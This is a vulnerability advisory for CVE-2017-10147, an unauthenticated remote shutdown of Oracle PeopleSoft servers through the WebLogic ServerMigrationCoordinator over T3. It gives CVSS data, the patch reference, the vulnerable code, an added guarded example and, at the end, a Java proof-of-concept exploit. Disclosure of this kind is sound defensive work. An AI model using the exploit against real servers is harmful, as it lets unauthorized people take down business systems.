ERPScan: ERPSCAN-17-041
Mar 16, 2017 - 12:00 a.m.

Unauthorized Container Shutdown In ServerMigrationCoordinator

2017-03-16 00:00:00
erpscan.io

CVSS3: 8.6 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS: 0.003 Low
Percentile: 67.2%

Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Missing Authentication for Critical Function
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147

CVSS Information

CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

VULNERABILITY DESCRIPTION

An attacker can send a specially crafted T3 request to stop the remote server.

VULNERABLE PACKAGES

PeopleSoft FSCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, apply the Oracle Critical Patch Update (CPU) of July 2017.

TECHNICAL DESCRIPTION

The vulnerability is present in the migrate functionality of the WebLogic/cluster/singleton/ServerMigrationCoordinator class.

When the migrate function is called over the T3 protocol, the PeopleSoft server is stopped without any authorization.

```java
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine,
                    final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
    ServerMigrationTask task = this.taskMap.get(serverName);
    if (task == null) {
        task = new ServerMigrationTask(serverName, destinationMachine);
        if (MigrationDebugLogger.isDebugEnabled()) {
            MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
        }
        this.taskMap.put(serverName, task);
        try {
            // The server is stopped here; nothing in this method checks who the caller is.
            this.stopServer(sourceDown, task);
            this.startServer(destinationDown, task);
        } finally {
            this.taskMap.remove(serverName);
        }
        return;
    }
    throw new ServerMigrationException("Migration operation in progress", null);
}
```
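For contrast with the listing above, a simplified model of the same flow with an authorization gate placed in front of the stop/start step. This is an added example, not Oracle's patch or WebLogic code; the `Caller` record, the `Admin` role name and the in-memory `running` map are hypothetical stand-ins.

```java
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

// Added illustration: simplified model, not WebLogic or Oracle code.
public class GuardedMigrationCoordinator {
    // Hypothetical caller identity; in a real server this comes from the
    // authenticated session of the remote call, never from call arguments.
    record Caller(String name, Set<String> roles) {}
    static final String REQUIRED_ROLE = "Admin"; // assumed role name
    private final Map<String, String> taskMap = new ConcurrentHashMap<>();
    private final Map<String, Boolean> running = new ConcurrentHashMap<>();

    GuardedMigrationCoordinator(String... servers) {
        for (String s : servers) running.put(s, true);
    }

    boolean isRunning(String serverName) {
        return running.getOrDefault(serverName, false);
    }

    // Same flow as migrate() above, with the authorization gate placed
    // before any task is registered or any server is stopped.
    void migrate(Caller caller, String serverName, String destinationMachine) {
        if (caller == null || !caller.roles().contains(REQUIRED_ROLE)) {
            throw new SecurityException("migrate denied for "
                    + (caller == null ? "anonymous" : caller.name()));
        }
        // putIfAbsent checks for and registers the task in one atomic step.
        if (taskMap.putIfAbsent(serverName, destinationMachine) != null) {
            throw new IllegalStateException("Migration operation in progress");
        }
        try {
            running.put(serverName, false); // stands in for stopServer()
            running.put(serverName, true);  // stands in for startServer()
        } finally {
            taskMap.remove(serverName);
        }
    }

    public static void main(String[] args) {
        GuardedMigrationCoordinator c = new GuardedMigrationCoordinator("PIA");
        try {
            c.migrate(null, "PIA", "any_data_or_ip"); // unauthenticated call
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("PIA running: " + c.isRunning("PIA"));
        c.migrate(new Caller("ops", Set.of("Admin")), "PIA", "machine-b");
    }
}
```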

Proof of Concept

```java
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://" + PS_SERVER_IP + ":" + PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
    Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
    ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
    h.migrate("PIA", "а", "any_data_or_ip", true, true);
    return false;
}
```
